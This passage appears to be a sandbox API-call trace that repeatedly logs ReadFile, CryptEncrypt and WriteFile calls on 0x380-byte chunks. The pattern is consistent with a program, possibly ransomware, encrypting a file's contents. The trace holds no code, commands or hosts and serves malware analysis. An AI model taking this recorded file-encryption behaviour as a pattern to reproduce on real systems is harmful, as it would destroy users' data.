lpOverlapped=0x0) returned 1 [0258.506] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.506] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.506] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.506] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.506] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.506] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.506] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.506] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.506] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.507] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.507] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.507] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.507] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.507] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.507] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.507] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.507] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.507] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.507] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.508] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.509] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.509] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.509] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.509] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.509] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.509] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.509] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.509] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.509] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.509] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.509] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.509] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.509] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.509] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.510] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.510] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.510] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.510] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.510] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.510] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.510] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.510] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.510] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.510] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.510] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.510] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.510] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.510] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.511] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.511] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.511] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.511] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.511] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.511] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.511] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.511] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.511] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.511] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.512] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.512] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.512] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.512] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.512] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.512] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.512] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.512] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.512] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.512] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.512] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.512] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 